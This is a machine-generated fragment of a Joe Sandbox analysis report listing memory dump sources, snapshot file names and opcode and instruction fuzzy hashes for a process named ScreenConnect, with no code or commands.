                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6831AD30600B418FD734CF2AD89896AB7F1FF89724B504A6CD496DB7A8D730E945CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a6d218269123dcbd0a8b4d7358dc78ce880920d09b2fe6d70019fb783e578a8
                                                                                                                                                                                                                                                  • Instruction ID: 6f1166c41f737b5be68717b6e6ad99274e237379307846b3d00bdf0b03bbf4f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a6d218269123dcbd0a8b4d7358dc78ce880920d09b2fe6d70019fb783e578a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E314C316007018FCB34DF69C84866AB7F1EF99311B518A6CD456DB7A9D730E946CF80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 35beece30c4570a287a2576c8471fa4d209c503eb12a42de95bbc11aab070bda
                                                                                                                                                                                                                                                  • Instruction ID: 8ce9cac56f9030362ba249649010a7a09995db29db6ec6702044ec809711a9c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35beece30c4570a287a2576c8471fa4d209c503eb12a42de95bbc11aab070bda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD210375500240DFDB0ADF98DDC4B2BBF65FB98314F208669E9094B296C336D456CAA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d6caa190a9c26517d05c22dc306dfe2d13cbdc78a15a81e952630cd8ff545864
                                                                                                                                                                                                                                                  • Instruction ID: f2c1197c9ff547ba00cdaf69da97139262c688d40c59601a2383de3db316b08e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6caa190a9c26517d05c22dc306dfe2d13cbdc78a15a81e952630cd8ff545864
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821D431B002015FE70AEB28D951A6EBBA2FFC5210F058929D515AB3A5DF70AD05C7E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 47eec8294db8bdb8726c07329f7dcdd6de3f9ae960e1f7ba848471b1337be312
                                                                                                                                                                                                                                                  • Instruction ID: d95b9d11aa15e7a9db9c41ef5275ea4bd84a759e78d3f5f69437d71277b957fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47eec8294db8bdb8726c07329f7dcdd6de3f9ae960e1f7ba848471b1337be312
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC21B16160E3C15FC7078B39D890996BF71EF87220B5A80DFD885CB2A7DA35D846C762
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2db7f83e36f6b4322dccf56960ec98aa7780ac49f9bc80e870bb67bc52d68e17
                                                                                                                                                                                                                                                  • Instruction ID: 613901af2318e55ad27c43ecc24e7000f6eee61fc1ed98f123f3c0de8a93d409
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2db7f83e36f6b4322dccf56960ec98aa7780ac49f9bc80e870bb67bc52d68e17
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21A8369001069FCB00DFA8D9409DEBBF5FF45314B1485A9E505FB225D735AE06CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8a5846e14627623714be1c132c47138275389929765f855f9e2c21180a03360b
                                                                                                                                                                                                                                                  • Instruction ID: 347ae714aa9b938d38372d006046e49a1813b41d01b7df32a2e5ea8447fa2799
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a5846e14627623714be1c132c47138275389929765f855f9e2c21180a03360b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36218E31B103059FCB05DB68D9459AEBBB1FF85310B10856AE519EB365EB30ED05CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 41aafaac3af2f3bd96da15dba386eb53612003048c6c8348e483826db4ca1f6a
                                                                                                                                                                                                                                                  • Instruction ID: 764c052fc4779e55331a05680e8c2778b3438afc5f6659408f66105c6ab2942a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41aafaac3af2f3bd96da15dba386eb53612003048c6c8348e483826db4ca1f6a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F62135B5A00211CFCB18DF68EE4C4AEBBF1FF4432170881A6D90AD3269EB309C51CB51
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2d5a11e6298d8ed962eb45ad0f5f032106922347708559a47f772bc18a3b08c2
                                                                                                                                                                                                                                                  • Instruction ID: 06b6f07a4ce250b6f00b9f1c3391f2bd32686f6f7ecdd11ed875f024656c4e68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d5a11e6298d8ed962eb45ad0f5f032106922347708559a47f772bc18a3b08c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82115C33F056505FC7228B3DCC4CA4A7FAAEF9622071980EAF405DB3A1DE60DC008799
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd0e51377819e54ceb082b4fe61f6f4c1c963938a83b30a456ae800332ece0a5
                                                                                                                                                                                                                                                  • Instruction ID: 3d1f427ef9bb79c091f781661e7ca1751cbaad870516daaa82c5d351f726569e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd0e51377819e54ceb082b4fe61f6f4c1c963938a83b30a456ae800332ece0a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1121EB34600A058FD734CF29D844596BBB1FF84320B148B6DD592976A5DB31E95ACF90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f64bc5f89f5545e422f652291c77e8e50bc7e8f1d0ff1f2d6e83f00df3f98fda
                                                                                                                                                                                                                                                  • Instruction ID: c3fea1cc18d8358436d015d9f5384d2e9df522eb131905f7067f4b8860f34cce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f64bc5f89f5545e422f652291c77e8e50bc7e8f1d0ff1f2d6e83f00df3f98fda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62210E70A017418FD738DF79D84866ABBF1FF48310B618A6CD86687658D770F901CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cef3c8ee220ccc7e0672ca52bb66ffb55eb9385ffe2dbce295e64c136919b481
                                                                                                                                                                                                                                                  • Instruction ID: e4b4bd417790f72d46904544f88a45b03dcdb0ac0e82129bb1d5f296420b6704
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cef3c8ee220ccc7e0672ca52bb66ffb55eb9385ffe2dbce295e64c136919b481
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14213632D10B0A9DCB51EFB8D8405EAF7B4EF99310F11C62AE559A7111FB70A2958B80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 82c7a7e1af1687a126733614196dd7af24f381df82e9e4a9e84ca8227854e535
                                                                                                                                                                                                                                                  • Instruction ID: 7141766db5a2aa2376b4e1f3c76d1a8b548e04a847b09468f834e915fee7cafe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c7a7e1af1687a126733614196dd7af24f381df82e9e4a9e84ca8227854e535
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 991190317002055FE709EB68D94066EB7A7FFC4210F158929E516AB394DF70AD05C7E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3ddb825c8ba1346faceb694c1bec4e905ecfdf2e535ed7d7fcad8fa3d594a85f
                                                                                                                                                                                                                                                  • Instruction ID: 7fdb6263b5073207c342fd3b38664ec9f5f1a9ed520aa0e004c8f6f147da6706
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ddb825c8ba1346faceb694c1bec4e905ecfdf2e535ed7d7fcad8fa3d594a85f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 962134B6C00259DFCB14CF9AC844ADEBBF5FB88320F15846AE918A7210C339A555DFA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8edcb56b88238549d1f92de21caea79d346452327eb778f58cd947dc6d338f22
                                                                                                                                                                                                                                                  • Instruction ID: a544a83537cacb4dd1634e3a0a9b07c793b7f245f321cb84f832039fa8a94619
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8edcb56b88238549d1f92de21caea79d346452327eb778f58cd947dc6d338f22
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1117F31B1020A9FCB05DF68DD849AEBBF5FF88210B508529E519AB354DB70FC05CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9d07b33ef215752474c4e8196520ddec96f22f76fc38f35f1eb7c5ee7bd3c370
                                                                                                                                                                                                                                                  • Instruction ID: 5fdc9d56f0b70e1c0bb5f4bba2e578550341f96be173ddb8740379fc4481d6e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d07b33ef215752474c4e8196520ddec96f22f76fc38f35f1eb7c5ee7bd3c370
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511BF31E001099FCB04DFA8D559AAEBBF6FF44304F1180A9E509DB361EA74DD41CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1739d903e031f17ff4f61c128216c8bedecb53b6bf0bc42ac1628f0a462f69f2
                                                                                                                                                                                                                                                  • Instruction ID: 58dc7b34ba3976aafcf19dbafd6200dff91df938519bf5301c5e6f0b64cd685e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1739d903e031f17ff4f61c128216c8bedecb53b6bf0bc42ac1628f0a462f69f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9101F977D0E3908FC34A6B39581A1D13FA0E96715238B06D7E185CF16FD6158883E711
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b0ae42adfe520a951c23e812d97328d8e1abf88baad15a13f8cd9d8eb1be2994
                                                                                                                                                                                                                                                  • Instruction ID: 4719108321d503074186c477e412864d00031022fa9b9c70d4888a091d700f3d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0ae42adfe520a951c23e812d97328d8e1abf88baad15a13f8cd9d8eb1be2994
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64113036A0010A9FCB01DFA8C9819DEBBF5FF49314B148569E905FB261D735AA0ACF90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940031618.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_160d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                                  • Instruction ID: 402b27ece7fcd37344ea23306d802c8a7c46083ee740707f6b9ede0d67526ff2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11B176504280CFDB16CF54D9C4B26BF71FB94314F24C6A9D9490B256C336D45ACBA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7d4d2a60fb9c1e6488f977c2c2dfdff8c23b3c9909c96734079ea58464bde7a3
                                                                                                                                                                                                                                                  • Instruction ID: a4065203d17f5f9fe9505ec10ee7ae011754ddcabdb11015a4066acc673bca8b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d4d2a60fb9c1e6488f977c2c2dfdff8c23b3c9909c96734079ea58464bde7a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F2133B2C002099FDB24CF9AD484ADEFBF4EB88320F10846AD959A7250D378A545CFA5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1c14e8d12c2d742d103bf797c3b7b2cc3aaebb2b6c8022ebe731a914fe691448
                                                                                                                                                                                                                                                  • Instruction ID: 7ff19a79daa8647a0f2f2784ca9773a5fc05e52f9bbae248f32a015eefb7c1aa
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c14e8d12c2d742d103bf797c3b7b2cc3aaebb2b6c8022ebe731a914fe691448
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3110271E00244AFDB19CE68C810AEABBB6EF81300F4985A6E414D7158D7719902CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d6c0f8cb1be47b746bb06a35a7a702e6720034fdec5b59f534e0b3e84e141138
                                                                                                                                                                                                                                                  • Instruction ID: 1553079a7154d3073899c4664a16760f92a3a8733669b136a222eed332e5a290
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6c0f8cb1be47b746bb06a35a7a702e6720034fdec5b59f534e0b3e84e141138
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3501B53170A3915FC7169B78A84489ABFB5DF8326430685ABE454CF3E3EA34DD4AC361
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d2c19ada31c8ad035627137fb211ce67ccf582d1636cab2a4fa0fcde88e20579
                                                                                                                                                                                                                                                  • Instruction ID: 4b242818046262e7eaaaf42f6e264aae9c217d7be6ff2662b5df5ac9bc85603a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c19ada31c8ad035627137fb211ce67ccf582d1636cab2a4fa0fcde88e20579
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62118E71F40249AFDB18CA69C810AEBBBBAEFC5300F5985A5E514D7258E7719902CBD0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3481359a626e2d61b8f667461bf92faef2c594843aa6fb556d3c6cee2590a39b
                                                                                                                                                                                                                                                  • Instruction ID: ff2a5705c31029e359e9b3a1148b18f3c09ffc7bebfc22bbb58e74c2e3f3f249
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3481359a626e2d61b8f667461bf92faef2c594843aa6fb556d3c6cee2590a39b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11163190004EDFCB09DFACD9848DDBBB2FF85314B99C694E409AB169D735A986CB60
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4860396a323f4b9d1c3012600dc3aed07e6d5fef378799646990dd12a741f983
                                                                                                                                                                                                                                                  • Instruction ID: e4985e8d760b9608828826756e45f71c45403160db578d3f69c27d7b9b599d5a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4860396a323f4b9d1c3012600dc3aed07e6d5fef378799646990dd12a741f983
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F11E831A4021D9FDF18DBA8D9656EDBBB1EF89310F010469E005BB3B4DB785D44CBA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2faff2c1da2849246ab67ff5fad3b0138fb54996744b32d06b1514b1c70d113e
                                                                                                                                                                                                                                                  • Instruction ID: 6262192938a2be08d7d6da7f10e479071412dfbc053eae344f643105ebb5fff1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2faff2c1da2849246ab67ff5fad3b0138fb54996744b32d06b1514b1c70d113e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11827090434ACFCB1AEF6CC8456AD7FB0EF06310F51469AE815DB2A2E730D651CB91
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bd0ac215070317372d5efcc9facc264f1c698a4faffed2a9c068580af516dcbc
                                                                                                                                                                                                                                                  • Instruction ID: 61d7dca8bbff691e1bd734fbc20839d077de080b5e0885e516f0c318782a8fb4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0ac215070317372d5efcc9facc264f1c698a4faffed2a9c068580af516dcbc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8117C31A442199FDF18DBA8D9556EDBFB1EF49310F01446AE001BB364DB385D45CBA1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
